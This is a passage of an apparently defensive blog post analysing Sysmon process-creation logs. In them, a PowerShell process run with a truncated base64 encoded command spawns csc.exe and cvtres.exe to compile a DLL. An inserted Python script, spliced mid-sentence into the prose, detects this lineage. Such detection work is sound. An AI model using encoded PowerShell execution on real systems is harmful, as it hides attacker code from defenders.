0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; 
font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Task Category: Process Create (rule: ProcessCreate)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span 
class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process Create:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:03:37.177</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-a719-5f14-1cf9-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 44</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: 
normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">FileVersion: 4.8.3761.0 built by: NET48REL1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description: Visual C# Command Line Compiler</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Product: Microsoft® .NET Framework</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Company: Microsoft Corporation</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">OriginalFileName: csc.exe</span></p><p class="p1" 
style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\davehull\AppData\Local\Temp\3m35xm2u\3m35xm2u.cmdline"</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CurrentDirectory: C:\Users\davehull\Documents\</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User: 1011LABS\dave.hull</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonGuid: {fc3f293c-4e60-5f14-ee7e-3b0000000000}</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonId: 0x3B7EEE</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: 
normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">TerminalSessionId: 1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">IntegrityLevel: High</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Hashes: MD5=F8F36858B9405FBE27377FD7E8FEC2F2,SHA256=086C38FD66AEC0E824ECB74ECE3D7124174201A9B4F5C9974FCFDBAF04A5870E,IMPHASH=950FB6F62526333E663D35BA72D19DDC</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessId: 2752</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" 
style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentCommandLine: "C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe" -noexit -e JABLAHUAPQAnAFs...</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Above we can see </font><font face="courier">csc.exe</font><font face="inherit"> as a child of the PowerShell process with PID 2752. 
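To turn the parent/child relationships in these Sysmon records into something a detection engineer can query rather than eyeball, here is an added Python example (written for this page, not code from the post). It parses Event ID 1 records in the Key: value layout shown above, rebuilds each process lineage by ProcessGuid rather than PID (Windows reuses PIDs, the Sysmon GUID is unique per process instance), and flags csc.exe and cvtres.exe that descend from a PowerShell started with -EncodedCommand, which is the Add-Type compilation chain the post describes. The sample records are constructed from the fields in the post's events with hashes and other fields trimmed; the explorer.exe root, its PID 900 and the all-zero GUID are placeholders that do not come from the post.

```python
import re

# Constructed sample in Sysmon's "Key: value" layout, modelled on the post's
# Event ID 1 records. The explorer.exe root, PID 900 and the all-zero GUID are
# placeholders; base64 payloads are truncated as they are in the post.
SAMPLE_EVENTS = r"""
UtcTime: 2020-07-19 20:03:30.000
ProcessGuid: {fc3f293c-a718-5f14-a4dd-430000000000}
ProcessId: 1236
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABpAHMAPQAnACQASwB1AD0AJw...
ParentProcessGuid: {00000000-0000-0000-0000-000000000000}
ParentProcessId: 900
ParentImage: C:\Windows\explorer.exe

UtcTime: 2020-07-19 20:03:36.942
ProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}
ProcessId: 2752
Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
CommandLine: "C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe" -noexit -e JABLAHUAPQAnAFs...
ParentProcessGuid: {fc3f293c-a718-5f14-a4dd-430000000000}
ParentProcessId: 1236
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

UtcTime: 2020-07-19 20:03:37.177
ProcessGuid: {fc3f293c-a719-5f14-1cf9-430000000000}
ProcessId: 44
Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\davehull\AppData\Local\Temp\3m35xm2u\3m35xm2u.cmdline"
ParentProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}
ParentProcessId: 2752
ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

UtcTime: 2020-07-19 20:03:37.442
ProcessGuid: {fc3f293c-a719-5f14-89fc-430000000000}
ProcessId: 2128
Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\davehull\AppData\Local\Temp\RES2896.tmp"
ParentProcessGuid: {fc3f293c-a719-5f14-1cf9-430000000000}
ParentProcessId: 44
ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"""

POWERSHELL_IMAGES = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}
COMPILER_IMAGES = {"csc.exe", "cvtres.exe"}


def parse_events(text):
    """Split blank-line separated 'Key: value' records into a list of dicts."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        record = {}
        for line in block.splitlines():
            key, sep, value = line.partition(":")  # first colon only; paths keep theirs
            if sep:
                record[key.strip()] = value.strip()
        events.append(record)
    return events


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def uses_encoded_command(cmdline):
    """True if a switch resolves to powershell.exe's -EncodedCommand.
    powershell.exe accepts -e, -ec and any unambiguous prefix such as -enc."""
    for token in re.findall(r'"[^"]*"|\S+', cmdline):
        if token[:1] in "-/" and token[1:]:
            name = token[1:].lower()
            if name == "ec" or "encodedcommand".startswith(name):
                return True
    return False


def lineage(by_guid, guid):
    """Walk ParentProcessGuid links and return the records root-to-leaf."""
    chain, seen = [], set()
    while guid in by_guid and guid not in seen:
        seen.add(guid)
        chain.append(by_guid[guid])
        guid = by_guid[guid].get("ParentProcessGuid", "")
    chain.reverse()
    return chain


def find_addtype_chains(events):
    """Report csc.exe / cvtres.exe whose ancestry contains PowerShell.
    Severity is raised only when that PowerShell ran an encoded command:
    Add-Type from an interactive admin session compiles the same way."""
    by_guid = {e["ProcessGuid"]: e for e in events if "ProcessGuid" in e}
    findings = []
    for event in events:
        if basename(event.get("Image", "")) not in COMPILER_IMAGES:
            continue
        chain = lineage(by_guid, event["ProcessGuid"])
        names = [basename(p["Image"]) for p in chain]
        if chain[0].get("ParentImage"):  # the root's own parent is known by name only
            names.insert(0, basename(chain[0]["ParentImage"]))
        shells = [p for p in chain if basename(p["Image"]) in POWERSHELL_IMAGES]
        if not shells:
            continue
        encoded = any(uses_encoded_command(p.get("CommandLine", "")) for p in shells)
        findings.append({
            "pid": int(event["ProcessId"]),
            "chain": names,
            "encoded_powershell_ancestor": encoded,
            # SysWOW64 means a 32-bit PowerShell on 64-bit Windows, matching /MACHINE:IX86
            "wow64_powershell": any("syswow64" in p["Image"].lower() for p in shells),
            "severity": "high" if encoded else "low",
        })
    return findings


if __name__ == "__main__":
    for finding in find_addtype_chains(parse_events(SAMPLE_EVENTS)):
        print(finding["severity"], finding["pid"], ", ".join(finding["chain"]))
```

Feeding real Sysmon exports through the same functions only requires the ProcessGuid, ParentProcessGuid, Image and CommandLine fields; everything else in the record is ignored, so the hashes and user fields shown in the post can stay in the input unchanged.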
And next we see this </font><font face="courier">csc.exe</font><font face="inherit"> instance parenting </font><font face="courier">cvtres.exe</font><font face="inherit">:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:03:37 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; 
margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Task Category: Process Create (rule: ProcessCreate)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p 
class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process Create:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:03:37.442</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-a719-5f14-89fc-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 2128</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" 
style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">FileVersion: 14.10.25028.0 built by: VCTOOLSD15RTM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description: Microsoft® Resource File To COFF Object Conversion Utility</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Product: Microsoft® .NET Framework</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Company: Microsoft Corporation</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">OriginalFileName: CVTRES.EXE</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 
0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\davehull\AppData\Local\Temp\RES2896.tmp" "c:\Users\davehull\AppData\Local\Temp\3m35xm2u\CSC81A6F4C3835645A8965DB621A6C573D8.TMP"</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CurrentDirectory: C:\Users\davehull\Documents\</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">User: 1011LABS\dave.hull</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonGuid: {fc3f293c-4e60-5f14-ee7e-3b0000000000}</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonId: 0x3B7EEE</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: 
#f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">TerminalSessionId: 1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">IntegrityLevel: High</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Hashes: MD5=70D838A7DC5B359C3F938A71FAD77DB0,SHA256=E4DBDBF7888EA96F3F8AA5C4C7F2BCF6E57D724DD8194FE5F35B673C6EF724EA,IMPHASH=0FCE7AAB563778C495FB59AA62464473</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessGuid: {fc3f293c-a719-5f14-1cf9-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessId: 44</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; 
line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\davehull\AppData\Local\Temp\3m35xm2u\3m35xm2u.cmdline"</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">And here's the output, a dll created in the Temp directory:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; 
text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:03:37 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>11</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Task Category: File created (rule: FileCreate)</span></p><p 